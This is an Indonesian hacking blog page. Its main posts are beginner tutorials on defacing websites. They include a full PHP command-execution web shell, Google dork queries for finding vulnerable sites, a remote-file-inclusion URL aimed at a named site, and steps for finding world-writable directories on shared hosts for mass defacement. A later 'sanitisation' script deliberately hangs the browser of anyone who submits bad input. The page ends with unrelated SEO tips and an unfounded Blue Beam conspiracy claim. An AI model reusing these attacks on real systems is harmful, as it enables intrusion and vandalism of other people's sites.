Mencari Alamat Target didalam satu Hosting

TULISAN INI HANYALAH DI PERUNTUKKAN UNTUK PARA NEWBIES,
JADI KALO ENTE MERASA UDAH EXPERT, MERASA UDAH PINTER, KALO
MERASA... AH POKOKE KALO KALIAN ITU UDAH HEBAT, MAKA
DILARANG DAN SANGAT TERLARANG MEMBACA TULISAN INI DEMI
KEBAIKAN KALIAN SENDIRI. PENULIS TIDAK MENJAMIN JIKA KALIAN KELAK
BAKAL MATI KEBOSANAN KARENA MEMBACA TULISAN INI.
TERIMA KASIH.


Hmm... bila kalian semua udah pada baca artikel saya sebelumnya tentang “php-bugs dan permisi file” sehingga dapat mendeface dalam satu hosting walau target yang aslinya gak sempet kita deface. Nah, mungkin timbul pertanyaan dibenak kalian... Gimana seh caranya kita tahu and liat nama situs target yang kita deface dalam satu hosting itu.
Bisa dimengerti toH..!!!!??? :)

Gini loh, misalnya kita mendapatkan target www.contoh.com trus kita dapatin id yang kita jalankan di target adalah nobody (ini enggak mutlak lho, bisa aja id user yang kita jalankan adalah apache ato www-data pokoke prinsipnya kite memiliki hak menulis di target).

Nah setelah kite cek dan ricek, eh...... kita bisa melakukan mass defacing di sana :P~ (slurpp......) (ini kalo memang permisi file di target memungkinkan kita untuk melakukan mass defacing tapi kale kalian gak bisa ngelakuin mass defacing di target kalian, gak ada salahnya buat baca terus ini artikel, sapa tau di sana kalian dapatin web jualan misalnya, walo gak bisa deface, paling enggak bisa lah sekedar liat-liat suasana,  wakakaka...... ☺☺☺)

Hehehe...... kembali ke pokok masalah, langkah selanjutnya adalah melihat directori aktif kita saat ini. Bukan apa-apa, tujuan sebenarnya dari tindakan ini adalah untuk melihat dimana kita berpijak saat ini, soalnya kebanyakan (bahkan hampir semua target) nyatuin semua directory web dalam satu directory untuk memudahkan administrasi.

$pwd
/home/recompil/public_html

Lalu kita melihat di sana bahwa directory aktif saat ini adalah /home/recompil/public_html. Jika kita melihat directory aktif target tersebut, maka kita berasumsi bahwa admin menyatukan semua directory web usernya
ada di bagian /home.

Lho, kok di bagian /home seeh ??? Bukannya di /home/recompil ???
OK... kita simpan dulu pertanyaan tersebut. Entar kita membahasnya OK.
Lalu langkah kedua adalah melihat daftar user-user web yang berada di bagian
directory /home dengan menggunakan command ls –la.

$ls –la /home
total 4620
drwxr-xr-x 273 root root 8192 Aug 4 13:00 .
drwxr-xr-x 16 root root 4096 Nov 30 2003 ..
drwx--x--x 7 abbeydis abbeydis 4096 Jun 22 07:39 abbeydis
drwxrwxrwx 7 acebroth acebroth 4096 Jun 22 02:28 acebroth
drwxrwxrwx 7 rattanwa rattanwa 4096 Jun 22 05:24 rattanwa
drwx--x--x 7 raygiubi raygiubi 4096 Jun 22 02:28 raygiubi
drwx--x--x 14 recompil recompil 4096 Jun 22 07:09 recompil

Nah, itu adalah hasil dari command ls –la di directory /home trus langkah selanjutnya adalah menentukan name site target yang bakal kite deface dalam 1 hosting dengan target asli kite ☺☺☺
Oh iya, tadi ada yang tanyakan kenapa directory web usernya ada di bagian /home dan bukan di bagian
/home/recompil. Nah, sebenarnya di bagian /home/recompil ada folder /public_html, file itu memang bawaan yang menjadi ciri khas apache, jadi sebenarnya letak web user itu ada di /home bukannya di /home/recompile.

next, kita gak perlu berhenti di sini. Langkah selanjutnya adalah melihat dimana letak httpd.conf target kita. Guna httpd.conf adalah sebagai configurasi apache dalam mengatur server. Lalu tujuan kita mencari  httpd.conf itu adalah untuk melihat vhost name server target kita (sebenarnya dari sana langsung bisa juga
seh tanpa perlu gunain command pwd ama ls –la segala ☺, tapi kayaknya gak menarik, soalnya entar tulisan ini gak penuh, wekekeke ☺☺☺).
Ada beberapa cara dalam mencari httpd.conf target. Salah satunya adalah :

$locate httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf.bak
/etc/httpd/conf/httpd.conf.old
/etc/httpd/conf/httpd.conf.new

Jika kita melihat fila hasil output dari command locate, maka jangan dulu
bingung file mana yang harus dilihat. Kita ambil file httpd.conf tanpa embelembel
segala sebagi patokan, jadi bukan httpd.conf.bak ato httpd.conf.old. Ingat
httpd.conf tanpa embel-embel yah.
Trus, kita liat deh tuh httpd.conf dengan perintah cat, caranya

$cat /etc/httpd/conf/httpd.conf
..........
<VirtualHost 66.45.242.178> ServerAlias www.abbeydistribution.com
abbeydistribution.com
ServerAdmin webmaster@abbeydistribution.com
DocumentRoot /home/abbeydis/public_html
BytesLog dmlogs/abbeydistribution.c
oom-bytes_log ServerName www.abbeydistribution.com
User abbeydis
Group abbeydis
CustomLog domlogs/abbeydistribution.com combined
ScriptAlias /cgi-bin/ /home/abbeydis/public_html/cgi-bin/
</VirtualHost>
..........

Sebenarnya tampilan file httpd.conf bukan seperti yang kalian lihat itu, itu hanya sekedar contoh pada bagian vhost user abbeydis yang memiliki site www.abbeydistribution.com yang meletakkan file-file webnya di directory /home/abbeydis/public_html.
Seep, gimana... udah ngerti kan apa yang saya maksudkan ☺☺☺

Namun, nah ini namun yah... terkadang di beberapa target, command locate malah gak mau jalan, entah itu dikatain bahwa command locate gak ada dalam daftar command-command yang bisa mereka handle-lah ato... pokoke yang jelas mereka ngatain bahwa yang namanya locate itu gak ada, udah digusur kali ama
adminnya :P~ Hehehehe

Nah, gimana neh kalo seandainya itu yang terjadi ???
Pengalaman saya sendiri seeh saya gunain command whereis dengan argumen ke httpd sebagai binnary-nya ato file executenya apache. Jadi command yang saya jalankan adalah whereis httpd kemudian setelah dapat hasilnya penulis lakukan command cat /<hasil dari command whereis httpd> ditambah dengan /conf/httpd.conf. jadi intinya begini loh :

$whereis httpd
/etc/httpd/httpd
$cat /ect/httpd/conf/httpd.conf
..........
<VirtualHost 66.45.242.178> ServerAlias www.abbeydistribution.com
abbeydistribution.com
ServerAdmin webmaster@abbeydistribution.com
DocumentRoot /home/abbeydis/public_html
BytesLog domlogs/abbeydistribution.com-bytes_log
ServerName www.abbeydistribution.com
User abbeydis
Group abbeydis
CustomLog domlogs/abbeydistribution.com combined
ScriptAlias /cgi-bin/ /home/abbeydis/public_html/cgi-bin/
</VirtualHost>
..........

Nah, mungkin ada beberapa teknik lain yang belom saya kuasai, seperti melihatnya melalui file-file configurasi DNS di target misalnya :P~ tetapi menurut saya ini sudahlah cukup. :)

Related Posts:

Deface dengan PHP Bugs

Kali ini saya ingin membahas tentang bug yang udah lama, soalnya saya pribadi paling jarang baca-baca tentang bug baru, dan paling malas ngikutin perkembangan zaman,hehehe. makanye saya di sini bakal nulis bug yang udah lama. Bug ini saya namain bug “tusuk-tusuk” tapi mungkin semua pada bilang ini bug namanya inject php bug ☺.
Sebelum kita memulai ngelakuin bug ini di target kita, ada baiknya kalian semua mengcopy dan paste code berikut ini ke website kalian, entah itu di geocities, portland, atau di hosting kalian terserah dah... 
Ini dia code yang mesti kalian copy-paste ke site kalian semua ( note : bagi ente-ente yang udah ada code ini di site kalian, gak perlu lagi, ini bagi yang belom ada aja ).

</center></center><br><font face="verdana" size="7"><center><b>CMD</b> - System
Command<br><br></center></font><font face="Verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> Re-DESIGN by : <b>m_beben from #kartubeben @ Dalnet</b><br>
<br>
<br>
<hr>
<br>
<pre><font face="Verdana" size="1">
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;",
$output));
?>
</font></pre>
<br>
<hr>
<br>
<font face="Verdana" size="1">
<b># m_beben from #kartubeben @ Dalnet</b><br>
<b># www.kartubeben.com | www.kartubeben.org | www.kartubeben.net</b>
<br><b># Come and join with us on #kartubeben @ Dalnet</b>
</font>

Hmm... mungkin ada yang tanya, maksud saya sebenarnya apa seh dan gimana cara masukin code ini ke site kite-kita pada ??? Gini lho maksud saya :( ini kita balik ke dasar lagi yah )
1. karena saya rekomendasikan hosting geocities, maka sekarang kalian semua buka web geocities di www.geocities.com
2. trus kalo kalian udah ada account di sana ya silahkan login ke sana, tapi kalo ente belom ada account, ada baiknya ente daftar dulu untuk buat account hosting di sana
3. seep... kita udah buat satu account
4. lalu kita login ke account pukisek kita itu di www.geocities.com
5. udah selesai login ke sana silahkan buka file manager ente di sana trus buatlah new file lalu isikan dengan code kita tadi. Ato kalo kalian gak mau repot-repot, pertama-tama copy-paste code yang saya kasih tadi ke pc kalian trus save dengan nama terserah kalian dengan ektensi .txt atau .jpg
lalu silahkan upload file yang udah kalian save di pc ente ke hosting dengan account yang udah kita buat tadi
6. di hosting, kalian bisa save code kita tadi dengan nama cmd.txt ato cmd.jpg
Seep... sekarang code tadi udah kita simpan di hosting kita, jadi kita bisa ngakses tuh code entar di www.geocities.com/accountkalian/cmd.txt ato
www.geocities.com/accountkalian/cmd.jpg.
Nah, sekarang masalah berikutnya adalah mencari target ☺. Bicara soal target adalah berbicara soal keberuntungan, wekekeke... saya aja kalo cari yang namanya target itu susah mati lho Cape banget... nyebelelin, bikin kesel,dll...
Nah, sekarang untuk masalah targetnya, kita bisa cari di google.com ☺ dengan keyword

allinurl: “index.php?*=*.htm*” ato allinurl: “index.php?*=*.php”
bisa juga
allinurl: “main.php?*=*.htm*” ato allinurl: “main.php?*=*.php”

terserah kalianlah mo pake apa keywordnya ☺☺☺
Okeh, misalnya kita udah dapat target di www.yugiohlegends. com/main.php?page=beben.txt nah, ini target kita inject, caranya masukin code inject php kita di target dengan cara

www.yugiohlegends.com/main.php?page=http://www.geocities.com/pukisek/cmd.jpg?&cmd=<di sini dimasukin perintah unix command>

jadi, di tempat unix command itu bisa masukin command unix apa aja, misalnya perintah locate orders.txt ato
locate orders.log :P~ tapi penulis lebih sering cari file httpd.conf dari pada orders.txt atau orders.log, soalnya saya bukan CARDER !!! :)
Okeh, kita gak bahas tentang saya ini seorang carder apa bukan, yang penting kalian semua bisa tentang masalah bug php ini.
Hm... tetapi inti sebenarnya yang saya mau bahas adalah bagaimana mendeface web dengan memanfaatkan perpaduan antara bug php ini sendiri dan permisi dari file-file di target kita. Siapa sangka jika seandainya  target yang enta ato penulis dapetin gak bisa untuk deface tetapi web yang berada satu hosting dengan target kita ternyata bisa di deface ☺.
www.udoka.com , www.theunderline.com yang ampe sekarang masih dalam keadaan terdeface ternyata saya deface dari target yang memiliki bug php yang laen sedang target itu sendiri belom kedeface. Makanya, jangan aneh kalo ada web yang saya deface padahal isinya hanya file-file statis, bukan dynamic
file seperti .php ato .asp namun tetap aja kedeface ☺☺☺

Bahkan kalo kalian pernah melihat site www.interaktif-online.com (udah mati) yang sempat beberapa kali kedeface ternyata di deface bukan dari site itu langsung, tetapi melalui hostingnya dulu, yaitu www.malang.indo.net.id
Nah, makanya jangan keburu nyesel dulu kalo liat ada target kita yang gak bisa dideface (dengan asumsi kita malas ngeroot di target tersebut macam penulis ☺).
Pertama-tama untuk melihat sebuah permisi file apakah sebanding dengan user id yang kita jalankan, maka gunakan command id lalu ls –la namun jangan keburu sedih dulu kalo ternyata user yang kita pake adalah nobody dan user yang nulis file di target adalah bebenkeren misalnya.
Hmm... lalu kita perhatikan permisi file di target kita, apakah ada yang bisa kita tulisi ? Biasanya karena kita nobody, file yang bisa ditulisi nobody adalah file yang allow write permission di bagian othernya.

$ls –l
total 1023
drwxrwxrwx 100 bebenkeren kartubeben 43203 kartubeben
drwx---rw- 3 bebenkeren kartubeben 1234 deface
drwxr-xr-x 11 bebenkeren kartubeben 23421 hosting
drwx------ 1000 bebenkeren kartubeben 12345 secret
-rwxr-xr-x 1 bebenkeren kartubeben 1234 beben.txt
-rwxrwxrwx 1 bebenkeren kartubeben 2332 kartubeben.txt

Jika kita perhatikan contoh hasil command ls -l di atas, maka user yang menulis di target adalah bebenkeren dengan group kartubeben sedangkan id yang kita jalankan adalah nobody, maka file yang dapat kita tulisi ato kita deface adalah folder kartubeben dan deface karena kedua file tersebut memiliki permisi yang dapat ditulisi oleh other. Jadi misalnya nama domain target kita adalah www.contoh.com maka kita bisa mempublikasikan hasil deface kita di www.contoh.com/kartubeben ato di www.contoh.com/deface.
Trus gimana kalo target kita ketika kita cek ternyata hasilnya adalah seperti berikut :

$ls –l
total 1023
drwxr-xr-x 555 root root 50000 .
drwxrwxrwx 100 apache apache 40000 ..
drwxrwxr-x 100 bebenkeren kartubeben 43203 kartubeben
drwx---r-- 3 bebenkeren kartubeben 1234 deface
drwxr-xr-x 11 bebenkeren kartubeben 23421 hosting
drwx------ 1000 bebenkeren kartubeben 12345 secret
-rwxr-xr-x 1 bebenkeren kartubeben 1234 beben.txt
-rwxrwxrwx 1 bebenkeren kartubeben 2332 kartubeben.txt
$pwd
/home/kartubeben/

Hmm... jika kita melihat sepintas maka tak ada file yang bisa kita tulisi sehingga kita tidak dapat mendeface target tersebut, tetapi tunggu dulu !!!. Coba kita perhatikan dengan seksama ternyata directory .. ato directory
sebelumnya/dibelakangnya ternyata memiliki permisi yang dapat ditulisi oleh account nobody sebagai other, dan wow !!! jika kita mendapati target yang demikian kita bisa melalukan mass defacing !!! ☺☺☺

Related Posts:

Percantik Tampilan USB Flashdisk

Kali ini sy mao berbagi trik untuk teman2... trik kli ini ialah mempercantik tmplan pada ufd kt. ini tulisan wa yg pertama... so kalo masi kaku2 gt di maklumin aja yaahh ;) lgsng saja pertama buka notepad dan masukkan script berikut :


[ExtShellFolder]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=desktop.jpg
IconArea_Text=0×0000FF
[.ShellClassInfo]
ConfirmFileOp=0

Tulisan desktop yang dicetak tebal adalah nama gambar..jadi kamu bisa mengganti gambar apapun dan kapanpun tinggal ganti nama picturenya aja... simpan kode script yang tadi anda copy kedalam flashdisk yang sudah disiapkan tadi..dengan nama dan extensi "desktop.ini"
Jangan lupa gambar harus berada pada halaman depannya ( tidak didalam folder )
Setelah itu.. kita akan mengubah icon pd ufd yg masi std. buka lg dong notepad.exe, ketik script :

-----[start]-----
[autorun]
icon=icon.ico
-----[end]-----

save as autorun.inf in ur ufd.
abis itu  ... cari file yg *.ico
ingat harus berekstensi ico ya. and then it rename with icon. stlh fd di replug... jadi dehhh ;)
Cara diatas bisa dipake buat device lainnya.

Related Posts:

Script Sanitasi Input ( Attack )

- Pengantar
HTML injection, script injection atau apapun istilahnya dari teknik hacking
klasik dengan metode memasukkan kode-kode HTML maupun JavaScript
kedalam field input suatu web based application memiliki potensi merusak yang
cukup besar apabila tidak ditangani dengan baik...bagi programmer pemula
yang tidak banyak mengetahui fungsi-fungsi yang ada tentu akan menjadi
masalah yang cukup menyusahkan. Disini saya mengambil contoh penggunaan
dengan PHP programming, banyak disediakan fungsi-fungsi untuk mengatasi
hal tersebut...misalnya :
* strip_tags, mysql_escape_string, htmlentities dll
* menerapkan aturan regular expresion -> preg_match, ereg, ereg_replace

- Potensi Kerusakan
Kerusakan yang dapat terjadi sangatlah berbahaya apabila seorang penyerang
mengetahui kelemahan dari sanitasi input pada aplikasi web kita, misalnya
dengan memasukkan kode-kode HTML dan JavaScript seorang penyerang dapat
merubah tampilan dari aplikasi kita ataupun mendirect halaman dari aplikasi
kita ke alamat penyerang dan berbagai macam bentuk potensi merusak lainnya.

-Kelemahan selain HTML injection
Permasalahan lainnya dari sanitasi input adalah penanganan terhadap input dari
user berupa karakter tanpa spasi, dengan memasukkan karakter tanpa spasi
dalam jumlah yang besar akan menyebabkan rusaknya tampilan aplikasi web
kita...tentu hal ini sangat menyebalkan dan kita tidak menginginkan itu terjadi
bukan?? :) dan terkadang saya juga ingin sedikit membalas tindakan mereka ;)
Setelah kita melakukan sanitasi terhadap kode-kode html maka diperlukan juga
sanitasi terhadap input karakter tanpa spasi yang dapat merusak tampilan
12
website kita, sekaligus untuk sedikit memberi pelajaran pada siiseng..
kita buat browser dia untuk looping sebanyak2nya...

- POC (Proof Of Concept)
Disini kita akan membuat sebuah fungsi yang akan digunakan untuk mensanitasi
string yang dimasukkan oleh user, apabila string tidak
bermasalah/mengandung kode-kode dan maksud yang tidak baik maka data
akan diinput kedalam database aplikasi kita sedangkan jika sebaliknya maka
fungsi ini akan memfilternya dan mem-bypass ke sebuah script yang akan
diterima oleh user yang mengirimkan kode tersebut :)
Langkah-langkahnya adalah sebagai berikut -->>
1. buat file untuk fungsi mengecek komentar/teks input

cekKomen.php
# 1 <?php
# 2
# 3 function komentar($komentar)
# 4 {
# 5 if(!empty($komentar))
# 6 {
# 7 $bersihKomentar = preg_match("/^[a-z0-9. .,.:.-]+$/i", $komentar); // mengijinkan alphanumerik
# 8 $ok = explode(" ",$komentar);
# 9 $jml = count($ok);
# 10 for($i=0;$i<$jml;$i++)
# 11 {
# 12 $hal[$i] = strlen($ok[$i]);
# 13 }
# 14 for($i=0;$i<$jml;$i++)
# 15 {
# 16 if (($hal[$i] > 20) || (!$bersihKomentar)) // asumsi jumlah karakter dari setiap kata > 20 (bisa dirubah)
# 17 {
# 18 $keluar = false;
# 19 break;
# 20 }
# 21 else
# 22 $keluar=true;
# 23 }
# 24 if($keluar==true)
# 25 return $komentar;
# 26 }
# 27 else
# 28 return $komentar;
# 29 if ($keluar==false)
# 30 {
# 31 ?>
# 32 <script>
# 33 var bilangan=1;
# 34 do{
# 35 alert("Kenapa...! Mo coba HAcking Yah...BRoWseR ANda HanG SekAraNG");
# 36 bilangan ++;}
# 37 while(bilangan<=1000);
# 38 </script>
# 39 <?
# 40 }
# 41 }
# 42 ?>
--------------------------------------------eof---------------------------------------

- Penjelasan Script
Baris 3 menyatakan kita membuat sebuah fungsi untuk melakukan sanitasi dari
variabel komentar.
Baris 5 membuat suatu kondisi apabila user telah melakukan input data
Baris 7 melakukan sanitasi terhadap string dengan hanya mengijinkan karakter
alphanumerik
Baris 8 memecah karakter input berdasarkan spasi
Baris 9 menghitung jumlah kata pada data input utnuk dijadikan parameter
dalam melakukan penelusuran
Baris 12 - 22 menghitung jumlah huruf pada setiap kata dan apabila ditemukan
jumlah huruf > 20 atau ditemukan karakter yang tidak diijinkan maka akan
menciptakan kondisi false, sebaliknya akan menciptakan kondisi true.
Baris 24 - 25 Jika kondisi true maka data yang akan dimasukkan oleh user akan
dimasukkan kedalam database apa adanya.
Baris 27 - 38 Jika kondisi false maka fungsi akan mem-bypass input dari user dan
mengeksekusi sebuah script yang akan dikirimkan kekomputer klien/user
penyerang. Dalam contoh ini saya membuat pada komputer user akan muncul
kotak peringatan yang harus diklik 1000 x, dan ini akan membuat browser user
tidak berjalan semestinya/hang

- Implementasi
2. Sertakan file dan fungsi tersebut pada script input kita....
# 1 <?php
# 2 include "connect.php";
# 3 include "cekKomen.php";
# 4
# 5 if(!$submit) {
# 6 ?>
# 7 <form name="form1" method="post" action="">
# 8 <table width="200" border="1">
# 9 <tr>
# 10 <td>Nama</td>
# 11 <td><input name="nama" type="text" id="nama"></td>
# 12 </tr>
# 13 <tr>
# 14 <td>Jabatan</td>
# 15 <td><input name="jabatan" type="text" id="jabatan"></td>
# 16 </tr>
# 17 <tr>
# 18 <tr>
# 19 <td>Komentar</td>
# 20 <td><textarea name="komentar" id="komentar"></textarea></td>
# 21 </tr>
# 22 <td colspan="2"><input name="submit" type="submit" id="submit" value="Submit"></td>
# 23 </tr>
# 24 </table>
# 25 </form>
# 26
# 27 <?php
# 28 } else {
# 29 connect();
# 30 $periksaNama = strip_tags($nama);
# 31 $periksaJabatan = strip_tags($jabatan);
# 32 $periksaKomentar=komentar($komentar); // menyertakan fungsi sanitasi komentar
# 33 $query=mysql_db_query($db, "insert into user (nama, jabatan, komentar) values
# 34 ('$periksaNama', '$periksaJabatan','$periksaKomentar')");
# 35 if($query){
# 36 echo "Data Berhasil diinput";
# 37 }else{ echo "Data Gagal diinput"; }
# 38 }
# 39 ?>
--------------------------------------------------eof-------------------------------------------

Baris 5 - 25 menampilkan form input dengan variabel-variabel tertentu apabila
form dalam kondisi tidak terkirim
Baris 29 - 34 melakukan sanitasi terhadap karakter yang diinput dan
memasukkannya kedatabase apabila bersih dari kode maupun input yang tidak
baik berdasarkan fungsi yang disertakan.

- Penutup
Artikel ini saya buat sebagai pembelajaran bagi para programmer pemula (termasuk saya) dalam melakukan sanitasi input, serta memberi pelajaran bagi user yang bermaksud tidak baik :)
Saya sengaja memasukkan unsur-unsur fungsi sanitasi sebagai contoh implementasi... serta saya tidak membuat sebuah kode/script yang dapat merusak balik penyerang aplikasi kita, walaupun itu bisa saja dilakukan dengan memasukkan kode-kode exploit maupun virus. Ingat kita bukanlah cracker yang
melakukan perusakan. Algoritma ini dapat diterapkan pada semua jenis scripting programming, tidak
hanya sebatas pada PHP...

- Referensi
1. Web Hacking: Serangan dan pertahanannya - Stuart McClure
2. Writing Security Tools and Exploits - James C. Foster ; Vincent Liu
3. Hackers Handbook - Auzy_build011
4. Professional PHP Programming - Jesus Castagnetto ; Harish Rawat dkk
4. www.forum.mercubuana.it.org
5. Ezine from Echo.or.id

Related Posts:

Cara mendatangkan banyak pembaca

Bersikap sabar
Mendatangkan banyak pembaca itu perlu waktu, jadi kita perlu bersabar tidaklah mungkin blog yang baru dibuat seminggu didatangi ribuan pengunjung. Jadi bersabar dan tidak usah terburu buru.

Konten berkualitas dan desain yang menarik.
Saat ini ada sekitar juataan blog yang wara wiri didunia maya yang menjadi pesaing kalian. Jadi berilah pembaca sesuatu yang unik dan bermanfaat untuk dibaca. Konten yang unik dan menarik perhatian biasanya dapat mendatangkan banyak pengunjung.

Buat link keblog lain
Selain membuat konten original, melink blog lain juga akan menjadi sarana menarik perhatian blogger lain. Jangan membuat link kesemua blog, tetapi pilihlah blog yang memiliki konten yang benar benar bagus. Jika kalian secara teratur membaca sejumlah blog sebaiknya kalian membuat blogroll dan menaruh link dari blog lain yang bisa dibaca.

Membuat komentar diblog lain
Upayakan agar kalian merupakan komentator yang pertama di blog itu. Ini bisa terjadi apabila kalian proaktif, atau beruntung. Jika memungkinkan, berikan komentar berupa pertanyaan, tentu saja pertanyaan yang berkaitan dengan topik yang dibahas.

Update secara teratur
Jika melakukan update secara teratur, pembaca akan datang secara teratur. Juga akan membuat bot mesin pencari mendatangi bog secara teratur dan lebih sering.

Manfaatkan mesin pencari
Semakin lama blog kalian aktif dan semakin banyak postingan yang dibuat maka semakin besar kemungkinan mesin pencari mendatangkan banyak pengunjung.

Daftar ke blog search engine
Daftarkan blog kalian ke situs seperti Technorati. Situs seperti ini memiliki fitur yang memungkinkan orang melakukan pencarian melalui topik dankata kunci.

Jadi diri sendiri
Ada jutaan tips dan trik seputar cara mendatangkan pembaca, seperti yang telah saya utarakan diatas. Namun yang perlu diingat adalah tidak ada hukum baku dalam dunia blogging. Semua tips dan trik umumnya berasal dari pengalaman. Jadi sebaiknya jadilah diri sendiri, dan jangan ragu melakukan berbagai eksperimen terutama cara menulis dan dan metode penulisan.

Related Posts:

Tips menarik banyak komentar

Aktif berkomentar di blog lain
Sebagian besar blogger  terutama di indonesia mempunyai kebiasaan unik, yaitu mereka hanya mau berkomentar ke blog lain kalau ada pihak lain yang berkomentar terlebih dahului ke blognya. Hukum memberi dan menerima berlaku disni. Jadi hal yang bisa kita lakukan disini adalah mencoba berkomentar diblog lain, berikan komentar yang sesuai dengan isi postingannya, jangan hanya sekedar kata kata makasih infonya, apalagi menggunakan kalimat pertamax ( yang artinya dia yang pertama berkomentar ).

Permudah cara berkomentar
Kadang kala, untuk mengantisipasi kemungkinan munculnya komentar spam, para blogger membuat jaring pengaman pada kotak komentarnya, seperti mengaktifkan fitur moderasi, password  ataupun capcha. Ini sah-sah saja, namun jika anda ingin mendapatkan lebih banyak komentar, sebaiknya kalian benar-benar mempermudah cara berkomentar. Berdasarkan pengalaman jika si pemberi komentar gagal berkomentar di kotak komentar kalian maka dia enggan melakukannya untuk yang kedua kalinya.

Usahakan selalu membalas komentar
Karena pembaca adalah tamu yang berkunjung, jadilah tuan rumah yang baik. Jadi usahakan selalu membalas sapaan atau komentar yang dibuatnya.

Tulis tema yang “merangsang”
Pilih tema yang merangsang dan memancing rasa ingin tau dan dipostingan diatur sedemikian rupa sehingga kesimpulan mengambang atau menggantung. Hai ini tentu akan menarik pengunjung yang membaca berkomentar.

Beri bonus
Bonus tidak perlu berupa uang yang saya maksud disini adalah setiap pengunjung yang berkomentar akan mendapatkan imbalan berupa link gratis dengan cara menjadikan blog Dofollow. Untuk membuat blog menjadi dofollow baca disini.

Related Posts:

Keyword untuk SEO

Dimana tempat terbaik untuk menaruh keywords untuk SEO
Apabila kita sudah mendapatkan keywords yang kita rasa bagus, kita perlu tahu di mana harus menempatkan kata kunci tersebut di situs Web kalian.

Related Posts:

10 Teknik Dasar SEO

Search Engine Optimization atau yang lebih dikenal dengan dengan istilah SEO adalah cara seseorang untuk meningkatkan traffic ataupun Page rank Website atau blog mereka dimesin pencari. Teknik SEO digunakan agar website atau blog kita menempati perinkat 1,2 atau 3 pada mesin pencari. Sebagai contoh kalian yang sedang melakukan searching di mesin pencari anggap saja google.com, jika sudah tidak menemukan apa yang kalian cari pada halaman pertama sudah pasti kalian akan males membuka halaman yang kedua atau pun seterusnya bukan. Nah, SEO digunakan untuk menempati posisi blog atau website kita dihalaman terdepan dari google dan kawan-kawannya.

Related Posts:

Cara Membuat Folder Rahasia

Kalian mungkin tidak ingin data-data penting bahkan yang bersifat privasi kalian dilahat oleh orang lain yang sedang menggunakan komputer ataupun laptop kalian bukan.
ngak perlu pake software yang aneh-aneh deh, tinggal buat aja sendiri programnya, gampang kok. ikuti aja langkah-langkahnya.

Related Posts:

Cara Mencegah Virus Dari Flasdisk

Dengan penggunaan flashdisk yang sudah umum dimana-mana, menjadi salah satu sebab menjamurnya virus, terutama virus lokal. Ini terlihat sejak masa jayanya virus brontok. Sampai saat ini, saya sering sekali melihat hampir setiap komputer/laptop teman-teman di perkantoran terkena virus, yang terkadang mereka tidak menyadari. Selain Antivirus yang seharusnya senantiasa diupdate minimal seminggu sekali, sebenarnya ada tips yang sangat bermanfaat untuk mencegah menularnya virus dari media seperti flashdisk tanpa kita sadari.
cara ini intinya hanyalah menonaktifkan fungsi autorun pada komputer kalian, karena sebagian besar penularan virus dari flasUSB memanfaatkan fungsi ini.

Related Posts:

Mengubah Nofollow menjadi Dofollow

Pernah denger blog yang nofollow sama yang dofollow..tw bedanya ??
dengan membuat blog menjadi Dofollow pengunjung akan tertarik untuk berkomentar diblog kita, kenapa,?
karena fasilitas dofollow ini memberi kesempatan blog pengunjung untuk di indeks sama mesin pencari, google khususnya, satu lagi blog yang dofollow katanya bisa mempercepat rank blog kita,. hehe

Related Posts:

Membuat shutbox tersembunyi

Bagi kalian yang bnyak memiliki gadget pada template kalian mungkin akhirnya akan bingung dimana lagi harus meletakan gadget-gadget kalian. Kali ini saya akan mebagi sedikit ilmu bagaimana caranya membuat buku tamu yang tersembunyi sehingga dapat menghemat sedikit tempat pada template kalian

Related Posts:

Yahudi Dalam Pandangan Al-Qur'an

Al-Quran telah banyak berbicara tentang Bani Israel, watak dan moral mereka serta para nabi dan sejarah mereka.
Surah-surah Makkiyah dipenuhi dengan pemaparan historis tentang kisah-kisah mereka, siksa Firaun terhadap mereka, dan kondisi mereka pada masa sebelum kenabian Muhammad Shallallahu ‘Alaihi wa Sallam .

Related Posts:

Project blue beam sang dajjal

pernah denger BLUE BEAM..?? sedikit info mengenai project tersebut.

PENGERTIAN
Project Blue Beam adalah proyek rahasia yang melibatkan NASA dan Perserikatan Bangsa-Bangsa. Terdiri dari sebuah rencana yang melibatkan empat langkah untuk menciptakan sandiwara-buatan mengenai "Kedatangan Kedua Yesus/Isa A.S ke bumi" (second coming of Jesus/ Isa A.S) untuk mendirikan sebuah "satu agama dunia" yang dikendalikan oleh Tata Dunia Baru. Pertama kali dilaporkan ke publik pada tahun 1994 oleh Serge Monast, seorang wartawan Canada.

Related Posts:

Tutorial Fake Login

Pernah denger fake login,, ?? alamat situs palsu yang mirip dengan situs aslinya yang meminta kalian memasuki akun yang kalian miliki sehingga sang pembuat situs palsu dapat mengetahi informasi mengenai akun kalian seperti username dan passwordnya..

Related Posts: